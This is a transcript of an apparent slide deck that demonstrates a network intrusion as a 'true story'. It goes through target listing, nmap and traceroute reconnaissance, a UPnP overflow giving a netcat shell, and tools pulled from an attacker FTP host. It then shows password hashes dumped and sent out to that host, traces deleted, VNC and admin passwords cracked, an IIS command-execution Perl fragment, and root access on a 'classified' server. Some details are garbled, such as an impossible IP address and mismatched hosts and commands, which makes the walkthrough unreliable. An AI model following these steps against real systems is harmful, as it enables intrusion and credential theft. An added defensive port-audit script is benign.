UPnP Buffer Overflow Demo

This is a True Story …of what could happen

Upload: bryce-carr

Post on 18-Jan-2016


TRANSCRIPT

Page 1: UPnP Buffer Overflow Demo This is a True Story …of what could happen

UPnP Buffer Overflow Demo

Page 2

This is a True Story …of what could happen

Page 3

Identify Target

Page 4

rri-usa.org IP: 208.247.65.240

Page 5

Host; role; contacts; IP; yes/no

goliath.rri-usa.org; target systems; Coffey, Brian; Ward, Joanne; 208.247.65.240; yes
david.rri-usa.org; target systems; Coffey, Brian; Ward, Joanne; 216.92.195.219; yes
armaggedon.rri-usa.org; target systems; Coffey, Brian; Ward, Joanne; 208.247.65.192; yes
moneymaker.rri-usa.org; target systems; Coffey, Brian; Ward, Joanne; 208.247.65.224; yes
DNS; 198.6.1.65; DNS 198.6.1.182; Yes
beast.rri-usa.org; target systems; Fish, Bob; Duck, Wayne; 208.247.65.256; yes
master.rri-usa.org; target systems; Coffey, Brian; Ward, Joanne; 208.247.65.248; no
gladiator.rri-usa.org; target systems; Riandi Grant; Charles Robert; 208.247.65.248; no
watcher.rri-usa.org; target systems; Coffey, Brian; Ward, Joanne; 208.247.65.248; no
cover.rri-usa.org; target systems; Coffey, Brian; Ward, Joanne; 208.247.65.248; no
johnson.rri-usa.org; target systems; Charles Robert; Horace Oliver; 208.247.65.248; no
nighthawk.rri-usa.org; target systems; Coffey, Brian; Ward, Joanne; 208.247.65.248; no
harper.rri-usa.org; target systems; Riandi Grant; Charles Robert; 208.247.65.248; no
insider.rri-usa.org; target systems; Coffey, Brian; Ward, Joanne; 208.247.65.248; no
jumper.rri-usa.org; Riandi Grant; Charles Robert; Horace Oliver; 216.92.195.65; no

identify target

Page 6

Scope Target Topology

Page 7

Microsoft Windows 2000 [Version 4.3.2800]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>tracert -d 216.92.195.219

Tracing route to 216.92.195.219 over a maximum of 30 hops

  1     7 ms     6 ms     7 ms  10.105.0.1
  2    11 ms     7 ms     7 ms  24.95.225.193
  3     7 ms     7 ms     8 ms  24.95.225.13
  4    13 ms    11 ms    12 ms  24.95.224.49
  5    17 ms    17 ms    18 ms  66.185.136.173
  6    16 ms    17 ms    18 ms  66.185.136.164
  7    36 ms    35 ms    36 ms  66.185.152.245
  8    52 ms    52 ms    51 ms  66.185.152.200
  9    52 ms    52 ms    64 ms  66.185.151.67
 10    53 ms    59 ms    52 ms  213.248.82.217
 11   170 ms   175 ms   170 ms  213.248.103.254
 12   170 ms   173 ms   182 ms  172.24.3.22
 13   184 ms   184 ms   185 ms  62.84.135.98
 14   183 ms   180 ms   180 ms  216.92.195.219

Trace complete.

C:\>

Page 8

Map Open Services

Page 9

Microsoft Windows 2000 [Version 4.3.2800]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>nmap -O -sS rri-usa.org/24

Starting nmap V. 2.2-BETA4 by Fyodor ([email protected], www.insecure.org/nmap/)
Host (216.92.195.219) seems to be a subnet broadcast address (returned 1 extra pings). Skipping host.
Interesting ports on rri-usa.org (216.92.195.219):
Port    State   Protocol  Service
22      open    tcp       ssh
111     open    tcp       sunrpc
135     open    tcp       loc-srv
139     open    tcp       netbios-ssn
445     open    tcp       microsoft-ds
515     open    tcp       printer
540     open    tcp       uucp
587     open    tcp       submission
901     open    tcp       samba-swat
1521    open    tcp       ncube-lm
1522    open    tcp       rna-lm
1528    open    tcp       mciautoreg
5000    open    tcp       fics
6000    open    tcp       X11
6112    open    tcp       dtspc
7100    open    tcp       font-service

TCP Sequence Prediction: Class=random positive increments
                         Difficulty=3916950 (Worthy Challenge!)
Remote operating system guess:

Nmap run completed - 256 IP addresses (2 hosts up) scanned in 13 seconds

C:\>

Microsoft Windows XP [Version 5.1.2600]
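A defender's way to use a port table like the one above, as an added example that is not part of the deck: it parses the nmap 2.x port listing and flags open services an Internet-facing host should not expose, among them 5000/tcp, the port the Windows XP UPnP service listens on and the target of the MS01-059 overflow this deck is named after. The exposure policy (FLAGGED_PORTS) is an assumption of this example, and the sample input is re-typed from the deck's screenshot.

```python
import re
# Port table re-typed from the deck's nmap screenshot (page 9), used as sample input.
NMAP_OUTPUT = """\
Port State Protocol Service
22 open tcp ssh
111 open tcp sunrpc
135 open tcp loc-srv
139 open tcp netbios-ssn
445 open tcp microsoft-ds
515 open tcp printer
540 open tcp uucp
587 open tcp submission
901 open tcp samba-swat
1521 open tcp ncube-lm
1522 open tcp rna-lm
1528 open tcp mciautoreg
5000 open tcp fics
6000 open tcp X11
6112 open tcp dtspc
7100 open tcp font-service
"""
# Exposure policy for an Internet-facing host (an assumption of this example, not from
# the deck). 5000/tcp is where the Windows XP UPnP service listens (MS01-059 overflow);
# the rest are RPC/management services that should not be reachable from outside.
FLAGGED_PORTS = {
    111: "sunrpc portmapper exposed",
    135: "MS RPC endpoint mapper exposed",
    139: "NetBIOS session service exposed",
    445: "SMB exposed",
    901: "SWAT (Samba web admin) exposed",
    5000: "UPnP/SSDP listener exposed (MS01-059 overflow target)",
    6000: "X11 server exposed",
}
PORT_LINE = re.compile(r"^(\d+)\s+(\w+)\s+(tcp|udp)\s+(\S+)$")


def parse_ports(text):
    """Return (port, state, proto, service) for each row of an nmap 2.x port table."""
    rows = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:  # the header and banner lines do not match and are skipped
            rows.append((int(m.group(1)), m.group(2), m.group(3), m.group(4)))
    return rows


def audit(text, policy=FLAGGED_PORTS):
    """Return (port, nmap service name, reason) for every open tcp port the policy flags."""
    return sorted((port, svc, policy[port])
                  for port, state, proto, svc in parse_ports(text)
                  if state == "open" and proto == "tcp" and port in policy)
```

Running audit(NMAP_OUTPUT) on the deck's table yields seven findings; the same parser can be pointed at any saved nmap 2.x listing.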

Page 10

Compromise Host

UPnP Buffer Overflow

Page 11

Microsoft Windows 2000 [Version 4.3.2800]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>cd ..\XPloit 216.92.195.219 -e
C:\>cd .\nc 216.92.195.219 7788

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\user>

Page 12

Upload pwdump2

Page 13

C:\Documents and Settings\user>ftp
ftp> open
To 67.8.205.154
Connected to 67.8.205.154
220 attacker FTP server (Windows 2000) ready.
User (67.8.205.154:(none)): tgillette
331 Password required for tgillette.
Password: ********
230 User tgillette logged in.
ftp> cd exploits
200 PORT command successful.
ftp> ls
200 PORT command successful.
150 ASCII data connection for /bin/ls (67.8.205.154,3584) (0 bytes).
pwdump2.exe
samdump.dll
226 ASCII Transfer complete.
ftp: 10 bytes received in 0.00Seconds 10000.00Kbytes/sec.

Page 14

ftp> get pwdump2.exe samdump.dll ..\system32\config
200 PORT command successful.
150 ASCII data connection for pwdump2.exe (67.8.205.154,3585) (17 kbytes).
150 ASCII data connection for samdump.dll (67.8.205.154,3585) (14 kbytes).
226 ASCII Transfer complete.
ftp: 31 kbytes received in 0.86Seconds 4000.00Kbytes/sec.
ftp> bye
221 Goodbye

C:\Documents and Settings\user>

Page 15

Get the Password File

Page 16

C:\Documents and Settings\user>cd C:\
C:\>C:\pwdump2 > password.txt
C:\>ftp
ftp> open
To 67.8.205.154
Connected to 67.8.205.154
220 attacker FTP server (Windows 2000) ready.
User (67.8.205.154:(none)): tgillette
331 Password required for tgillette.
Password: ********
230 User tgillette logged in.
ftp> put
Local file ..\password.txt
Remote file ...\passwords
200 PORT command successful.
150 ASCII data connection for …\passwords (67.8.205.154,3614).
226 Transfer complete.
ftp: 80 Kbytes sent in 0.02Seconds 4000.00Kbytes/sec.
ftp> bye
221 Goodbye

C:\>cd C:\WINDOWS\system32\config
C:\WINDOWS\system32\config>del pwdump2.exe samdump.dll passwd.txt
C:\>exit

Page 17

Decrypt Password File

Page 18

Administrator = J0hNnyUtaH

Page 19

Compromise Perimeter Host

Page 20

perl ~roelof/tools/fw1/sr.pl 196.33.86.8
196.33.88.57 S [ms01-023] {.printer} www.microsoft.com/Downloads/Release.asp?ReleaseID=29321

PING 63.77.125.1 (62.77.125.1): 56 data bytes
36 bytes from rri-usa.org (156.131.72.1943: Time to live exceeded

H:\>net view \\62.77.121.36
Shared resources at \\62.77.121.36

H:\>net use t: \\62.77.121.36\d_drive /USER:tadmin *
Type the password for \\63.76.122.41\d_drive: [tadmin]
The command completed successfully.

compromise perimeter host

Page 21

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\ca]

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\SystemCertificates\ca\Certificates]

\SOFTWARE\Policies\Microsoft\SystemCertificates\EFS]
"EFSBlob"=hex:01,00,01,00,01,00,00,00,78,02,00,00,74,02,00,00,1c,00,00,00,02,\
  38,30,82,01,a5,a0,03,02,01,02,02,0f,93,ee,46,14,ad,93,8c,4e,1f,6f,b0,a2,84,\
  e8,31,30,09,06,05,2b,0e,03,02,1d,05,00,30,50,31,16,30,14,06,0345,46,53,31,28,30,26,06,03,55,04,0b,13,1f,45,46,53,20,46,69,6c,65

extract encrypted password

"Password"=hex:61,f5,ec,5e,80,f5,c9,92

C:\>

Page 22

End Game: Compromise Classified Server

Page 23

C:\>x4 -W61f5ec5e80f5c992
Entered HEX String: 61 f5 ec 5e 80 f5 c9 92
Access Password: s3cr3t

decrypt classified UNIX access password

C:\>

Page 24

    # ------------ we can assume that the cmd.exe is copied from y $path;
    ($dummy,$path)=split(/:/,$thedir);
    $path =~ s/\\/\//g;
    $runi="/".$unidir."/sensepost.exe?/c";
    $thecommand=~s/ /%20/g;
    @results=sendraw("GET $runi+$thecommand HTTP/1.0\r\n\r\n");
    foreach $line (@results){
        if ($line =~ /denied/) {die "sorry, access denied\n";}
    }
    print @results;

    sub sendraw {
        my ($pstr)=@_;
        socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems\n");
        if(connect(S,pack "SnA4x8",2,$port,$target)){
            my @in="";
            select(S); $|=1; print $pstr;
            while(<S>) { push @in,$_; last if ($line=~ /^[\r\n]+$/ );}
            select(STDOUT);
            return @in;
        } else { die("connect problems\n"); }
    }

exploit internal host

$

Page 25

#> rlogin -l root tgtsunprod2
Last login: Tue Jul 3 14:52:41 from tgtsunprod1
Sun Microsystems Inc. SunOS 5.8 Generic February 2000
***** Warning Government Classified Server ***
You have mail.
tgtsunprod2 # /usr/sbin/ifconfig -a
lo0: flags=1000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4> mtu 8232 index 1
        inet 127.0.0.1 netmask ff000000
qfe0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2
        inet 172.16.22.7 netmask ffffff00 broadcast 172.16.21.255
        ether 8:0:20:f7:d0:78
dhsunprod2 # uname -a
SunOS tgtsunprod2 5.8 Generic_108528-04 sun4u sparc SUNW,Ultra-80
tgtsunprod2 # id
uid=0(root) gid=1(other)

final target compromised

$

Page 26

All your base are belong to us...

Page 27

…all your base? Bad English..

or something more sinister?